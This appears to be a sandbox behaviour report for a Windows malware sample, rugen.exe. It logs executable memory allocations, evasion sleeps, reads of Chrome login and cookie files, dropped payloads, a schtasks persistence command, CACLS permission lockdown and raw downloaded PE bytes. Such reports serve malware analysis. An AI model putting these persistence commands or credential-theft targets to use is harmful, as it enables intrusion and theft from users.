protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02060000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73dca000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04950000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04951000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04952000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04953000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a05000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a0b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a07000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bf1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6eeee000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ed6b000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04954000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04955000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ec9f000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009f7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009fb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009ed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description rugen.exe tried to sleep 142 seconds, actually delayed analysis time by 142 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

 number_of_free_clusters: 2425447
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2425447
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2425364
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2425364
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2424192
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2424192
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2424109
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2424109
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2423740
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2423740
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2423623
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2423623
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\g5428497.exe
file C:\Users\test22\AppData\Local\Temp\1000003051\mu.exe
file C:\Users\test22\AppData\Local\Temp\IXP004.TMP\k1262861.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\y4137827.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\n1216555.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\i1343857.exe
file C:\Users\test22\AppData\Local\Temp\1000002051\fotod95.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\f6048455.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\x5444390.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\x3761824.exe
file C:\Users\test22\AppData\Local\Temp\IXP004.TMP\l3225791.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\f3481382.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\i8510148.exe
file C:\Users\test22\AppData\Local\Temp\1000001051\foto172.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\g6015459.exe
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rugen.exe" /P "test22:N"&&CACLS "rugen.exe" /P "test22:R" /E&&echo Y|CACLS "..\200f691d32" /P "test22:N"&&CACLS "..\200f691d32" /P "test22:R" /E&&Exit
file C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe
file C:\Users\test22\AppData\Local\Temp\1000001051\foto172.exe
file C:\Users\test22\AppData\Local\Temp\1000002051\fotod95.exe
file C:\Users\test22\AppData\Local\Temp\1000003051\mu.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\x3761824.exe
file C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\i1343857.exe
file C:\Users\test22\AppData\Local\Temp\1000003051\mu.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Local\Temp\1000002051\fotod95.exe
file C:\Users\test22\AppData\Local\Temp\1000001051\foto172.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "rugen.exe" /P "test22:N"&&CACLS "rugen.exe" /P "test22:R" /E&&echo Y|CACLS "..\200f691d32" /P "test22:N"&&CACLS "..\200f691d32" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000001051\foto172.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000001051\foto172.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000002051\fotod95.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000002051\fotod95.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000003051\mu.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000003051\mu.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $4à/pAFpAFpAFnÓÔFaAFnÓÂF/AFnÓÅFZAFWG:FrAF³ŽFsAFp@F,AFyùÅFqAFnÓÕFqAFyùÐFqAFRichpAFPEL šdà  Âè @à@à€L<Ш/à8.textÁ `.rdata@-à.Æ@@.data,²–ô@À.rsrc¨ÐŠ@@U‹ì¸:É]ÃÌÌÌÌÌÌU‹ìSVWBƒæMNîÁ×сðÛëƒËZFGƒÆ1Á×$ƒèAHOÊ÷ê÷îÏìK÷ÚG¿é÷ØÁÊ=J÷êÁà ÁÖ7ÁÎNƒÊ/÷ê÷Ö÷ê÷Þ÷Ð÷ÐÁîƒãS÷ÓÁÞ=ã÷Ø÷ß÷ҁÏ̃ï>÷ßB3É3ÿÁÞèƒàV÷ï÷ÖÁ×b÷è÷è÷Ú÷ÚÁҞ÷ÖÁ×u÷è÷Ò÷ÒF÷ÐCÁËÓ¾¡@HïÒHÏÁÞH÷ïÅÁÏëÁ×=ƒêy÷ÖB¿qBC÷ÓK÷ÒÁÀaïÍÁÒÇ÷ÐC÷ÐÁÆ"ƒàjH÷ÖÁÚç‹M ƒÛ ÁҏÈKÁÚèÁËgƒÞ^CÚ¶÷Û÷ØNÁЎƒçgÁÞª÷ӁÆÝ÷ÖJÁÖF÷ׁ粁â¸÷×ÁÇ=÷ØGã†Ë÷ÒO»µJG΁îÕºáÁÒþF÷؁âÊ÷îÎJ÷Ú÷҃ K÷߁Çå‹}ö€^þGâö_^[]ÃÌÌÌÌÌÌU‹ìSVWÁÓÁÃ&Î÷êÁÒHÁÇTÁËÁÒf÷Ö÷҃ÈIÁØrƒã~÷ÖËGÁß3OÁËDÁˍ÷Ð ˆÆ±ƒê΃À^÷ê÷҃Â]÷׃î#ÎFG÷Ø÷Ð÷ÐÁϳKƒÀtƒÀN@JÁË!÷ßOC%Ë÷Û3É3ÿÊ÷ÓCOÎ÷ӃæƒÊ>÷×÷ÐFÏ÷èƒêKƒØIÁßy€HÃ‚¾2ƒÀ>ßþƒç.ƒêC÷Ѓë!÷ß÷ҁƉ÷èC÷êJ÷ÐCÁÂ1BJ±÷Ú÷ӁڈÁÐ!ÎÁÊ҃ê=÷ßÎȋM KNÁÊå÷ÓÎÁÚ@÷ï÷ӁÑ÷ÓHÁÒM÷Ö÷îJÈOÎȃÆSÁÏðÁÆI÷؃Ú\ÁÛ<ÈKÁËkÊÎÁÞÓC÷î÷ÓJƒÛ÷ރÆiƒÀ)ê³÷ÛF÷ëÊ¸ÁÀƒÃnÎñ÷ڃês‹}ö€^þGâö_^[]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ ÓrÝr&]^^ ö^ØX^öVN^vÉb__ۚV¦^^^^OۓBg„”B£‹^^^Y´^^^rÛoAÝpb^^^ŒÓÝpÌ^^^Ÿâ^^^Ýx¥^^^g„Ýsj^^^›Ü„mœ gs݀µ^^^ž ‹ÁOÛÝt~^^^‹ÿ˜ßg‡gŒ ‡^^^ ë^^^gv ¬^^^‹ð ^^^Ýt^^^g€gƒOÓVÕÒÓÒÓ V[ "Õ jÓjÝ&^^êT¦]^^^uåR^^ïgoۛ8g‡g€ž˜ݘÇ^^^ۗ?O–gƒO†gŽ€gsgtۄ@g†„@žèg†g‡Ýx´^^^g‹g„gsg€ˆÎݜ ^^^gt¤^^^ —^^^Ý|‹^^^gŽÓjÓ;^^^Óݺ^^^Õ ®ÕªÛáª^êR—Ù–`__^^^^sRÓjÓ *Õɖ`__ôZö^.^^ÓjÓ Óɖ`__ _IB~^ÕfÛáª^éIÓjÓf#*êT¦\^^^uÈS^^gsO‡ýg„ݜœ^^^O”“/O–݄f^^^gˆÝ¤^^^–ŠÝtÚ^^^9Ã^^^‡Ûo[Ûw]g„gp–2goƒk۔ågtžß—¸ÝƒÏ^^^g„ /^^^gŽO“gˆÝpÌ^^^ž*Ýpº^^^€!ݏ‰^^^ݓ©^^^‹ñÛ~Z˜¤6^^^g„ö^Z^^Ó V ÓfvNA^^ۚRv6d__!»^^é/[›3ž[ž+›Ù†3ƒ3›3›[žöÖ}^ÑÑî___v¡M^^ÑÑî___vlM^^vqe__!¼ù^^éDӞӞ;†;›+›[žÛn^Ûn^ӛӛ+›öÂ}^ÑÎvßM^^v¤e__!’û]^éC_~+ƒ#žٛ;† +›+ƒ_ŽÛ~^_~3›3žvËe__!Ê6]^éåv×e__!ß;^^éóvãe__!Yj^^é6ن¦^^^^ٛ3†¦^^^^ن3ƒ;†Ù› ;ž¦^^^^#›+†[›3žÙ›;†;†+†#ž;†#ƒÓž #› 3ƒ3ƒ[›ö®}^ÑÑ ___v~N^^ÑÑ ___vIM^^_~öž}^ÑŠv˜N^^v]e__!à7]^évif__!¤ÿ]^é:ٛ+ƒ+ž;†ö~}^ÑÑB___vÉN^^ÑÑB___v”N^^Û~^#†Ù†;›Ó›öj}^ÑÑ&___vïN^^ÑÑ&___vºN^^ÓjO§ JÓjÑNFÕ’—ÙF___^^^^sOÓÉF___ۜ]ÕÉF___ÓjO§X%ÑF___áÓÉF___óŒ6Ó’ÓNN ÓÉF___óŒ6Ó’ÓV[NJ ÓÉF___óŒ6Ó’Óf[NR vSC^^ۚRs¿gˆœáۘñ ã^^^ž£‹ې<‹£gˆÛƒ&g€ÝÞ^^^O“O”g€Q„^^^O–gƒg‡gƒžÐg‹OۜBOÝ”Ì^^^ƒèOÝpk^^^ÛwQ³gtgŒÝ“|^^^ݐ^^^Ýxˆ^^^Ogsې O”g„Ó jÓf#*OÚP]^^ÓjÓ f3 *ÕÉN___Óf[®ÕÙJ___—ÙR___^^^^ÓÑR___#ªOۄ^^^ÓÉJ___Óf[\ÕÙV___ÓÑJ___Ó ZÛtVtÕÉZ___ÓÙJ___۞VÕÙ^___—Ùb`__^^^^sOÓÑb`__۝]ÕÑb`__ÓÉb`__#ÉZ___áÓÙ^___O§VeRÛ}[ê)ÓÉ^___O§\9_O^^ÓÑV___ÓJ][ÉN___ÓÙ^___O§VÝ}_O^^ÓÙV___ÕJVÓÑ^___۝\ÕÑ^___sÒÓÉJ___ÓÙR___[ZÕÙR___ÓÑ^___ÕÑJ___uG___Y¼^^^“õOO‹†ƒO“gƒg†g‡Û“AÛvIO“zˆÀg‡€QgŒŽg‡žÝ݃f^^^ÝQÛ^^^g‹›Bgۛ$gŽېù9’^^^ۛDÝw|^^^ݛf^^^œtgtÛo7ݔ^^^¦^^^g€gˆÓ jÓf[ÜÞ^^^Õ–—Ùf`__^^^^sOÓÑf`__۝]ÕÑf`__ÓÉf`__óŒJÓ–ÛâNN^OÚO]^^ÓÑf`__ó•JÓ –Óf[TRÕÙr`__ÓÑr`__ _IF~^ÕÙj`__Û¡j`__^é\s»ÓÉf`__óŒJÓ–Óf[NNÕÑn`__—Ùv`__^^^^sOÓÉv`__ۜ]ÕÉv`__ÓÙv`__ÓÑn`__Û"Ý^OÚÕ^^^ÓÉv`__ÓÙn`__Óf[RÎÕÑ~`__ÓÉv`__ÓÙn`__O§RÎ ÓÉj`__ _IJ~^ÕÙz`__Û¡z`__^éAÓÙ~`__۞\ÓÑj`__ _IJ~^ÕÙz`__ÓÉf`__óŒJÓ–Óf[NNÓÉv`__ÓÙz`__ÕZÍu ___u“`__ۜ4g„gsƒ)go“Tݔ¡^^^ƒºgŒHÛt۔@Ý¿^^^gŒgtƒÛ—èO“gÛ{ãŸ^^^ˆæO–‡OgoÛpAۜߝˆjÛv OŸÛ^^^gŽ ‡þۖ÷Ûw= Á^^^۔þžxgo‹žÛ”5gv—Ù‚`__^^^^sOÓт`__۝]Õт`__Ó jO§
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $4à/pAFpAFpAFnÓÔFaAFnÓÂF/AFnÓÅFZAFWG:FrAF³ŽFsAFp@F,AFyùÅFqAFnÓÕFqAFyùÐFqAFRichpAFPELšdà  ÄàAà@€¬<ð¨¾/à8.textßÂÄ `.rdata -à.È@@.data,ÞÂö@À.rsrc¨ð¸@@U‹ì¸:É]ÃÌÌÌÌÌÌU‹ìSVWæ«ÁӂÁÏöÁÈõƒâ÷ÐÁÒÏÁʵÇÀ÷ރÏlHÁÂBÁÇYH÷؁ý÷ÒÁÚÚKHæ™ÁÞZKÁÞྜྷÂ¡÷îËGJÁÞÁÒ-ÁÏYCƒÊ÷ïëáÁÇ!ƒß>@â«ƒÆ5FÁÏûÁÃ@÷Ò÷Ú÷î3É3ÿ÷ß-ƒßgÁ΢÷Ú÷ëH÷îÊ÷ëB÷ցî±÷ÓHÁÂï÷ï÷փê#î´÷ÖÁÎ8÷ÒÁʊËÙ÷ÓρÞÒ©ÁÞQ»ˆÁÓ:ƒÆ&JƒãHÇ-•÷Ò÷×¾Áƪƒç'H÷ЃØOÊ-ŽÁÒQïä‹M ƒÛ,HÁß*ÁÏ>HÁߟ÷îÏ–ÁËûÑ×ÁÐĸ]ƒÃ%÷ЃîWÊÁÆ#ƒÎ,@ÁÞQ÷èG÷î¸m»6ÁÚ¦NGÁÏBÁÆgÊÁÊ´JÁÊyƒâO÷иs÷ÛÁË°Çù˃êæžÁӃƒëiÂãʾ4ÊŽ‹}ö€^þGâö_^[]ÃÌÌÌÌÌÌÌÌÌÌU‹ìSVWâíÏGFHG÷ØÏ÷Ò÷è÷Úˁށïƒ÷҃ê=ƒÇ@÷è΁ÛكÞtHÞ†ƒî÷ÖÊËÁο¸”ƒàlƒØJƒÆUÊ÷ڃÊkK÷ß÷ëƒã ÁØ'BÁȄ÷؃Ø¿«ÁÈ@ÁÒõ»’ÇÔ3É3ÿ¿„÷ÖO÷ÚÈ÷ë÷ÐÁÀ!JêãÁÆQ÷ÓNȃÚ\ç¯ƒâYFÁÃý÷ØÁËyÁÛí÷èÎ÷è÷ØBƒÊ¸øÁÆ4O¸!¥ƒÈ[ƒÈK÷߃çYʃÞ.êþ÷Þ ù%ÁÈ1¾É÷ЃÛ?â¬Kƒâc‹M GÁÇñÁÏ,÷Ú÷ÓF÷×ÁۅHÁß¼N»åÁÈ8ƒÆ\Á×à÷ÖÏ»Ò΃ÀGƒÛSÈNƒÊRºœÁËÇÈF÷Ø÷Ö%šÁÛƒßJ÷ïJ»hλUÊÁÛç÷Ð÷߁ꏃ؁ڲ»FƒëO‹}ö€^þGâö_^[]ÃÌÌÌÌÌÌÌÌÌÌÌÌ ÓrÝrî]^^ ö^¬X^öVN^v)b__ۚVg„gƒ–ۜöݛ™^^^‹ögƒݘ½^^^go„Øg€Ýh^^^€.g€gogŒgtgg‹9œ^^^ÝŠ^^^ݔÓ^^^gŒg‡g‡Ž—¦Ò^^^g„ŽJ¤!^^^9Û^^^goégpۃA1p^^^£^^^ۓ ·^^^›7ÓVÕÒÓÒÓ V[ "Õ jÓjÝ&^^êT¦]^^^u®R^^gˆs݀¶^^^gpA_^^^Ûãۗî¦u^^^—½gpÝ|‚^^^Á–6K¸9«^^^œˆˆÝoÊ^^^‹l݀‹^^^ggŒg€g‹Û†Kn‡¡£Ò^^^®‹NgŽgŽÛ›þݓ^^^gˆÇO–gs¤ª^^^O”KÓjÓ;^^^Óݺ^^^Õ ®ÕªÛáª^êR—ÙÎ`__^^^^sRÓjÓ *ÕÉÎ`__ôZö^.^^ÓjÓ ÓÉÎ`__ _IB~^ÕfÛáª^éIÓjÓf#*êT¦\^^^u¬S^^ˆƒgŽ‡-€ € g„O“˜ݜ¡^^^O“gsˆþ ˆƒO”ÛœgŒ›æg‡gtgpÝsh^^^Ýwb^^^‡7ݘt^^^O–ˆJgpg††W€ëQq^^^Ÿ^^^gvgŽ˜4Ûp%O›ªYÝ^^^ۃ\g‹–©gˆžÚ‡Ugö^Z^^Ó V Ófvò@^^ۚRvše__!øþ^^é/_Ž Ûn^3†Ûk^Û{^Û~^;›öÖ}^ÑÑî___vEK^^ÑÑî___vK^^vÕe__!fÞ^^éFنÛk^Ûk^3ƒÙ†Ûk^_ŽÛk^Ûn^öÆ}^ÑÎvL^^ve__!›á]^OÙÕ^^^ve__!ç?^^éêv"e__!7Z^^é';†#žÓ›3ƒÙ†Ù†Ûn^+ƒ+ƒÓ›;ž+ƒÓ›öº}^ÑÑ&___vÕL^^ÑÑ&___v L^^#†Ûk^#›3†Ù›Ó›3ƒÛ~^#›_~öª}^ÑÑ ___vL^^ÑÑ ___vÑL^^Ûk^;ž;ž+†vŸf__!kQ^^é v«f__!r]^é@[› ö–}^ÑÑ^___vEL^^ÑÑ^___vL^^#› Û{^;ž[ž;†+ƒö‚}^ÑÑB___voM^^ÑÑB___v:L^^öf}^Ѧv‡M^^v f__!¨A^^éA+žöF|^ÑÑz`__v¥M^^ÑÑz`__vpM^^ÓjO§ JÓjÑNFÕv—Ù~`__^^^^sOÓÉ~`__ۜ]ÕÉ~`__ÓjO§X%Ñ~`__áÓÉ~`__óŒ6ÓvÓNN 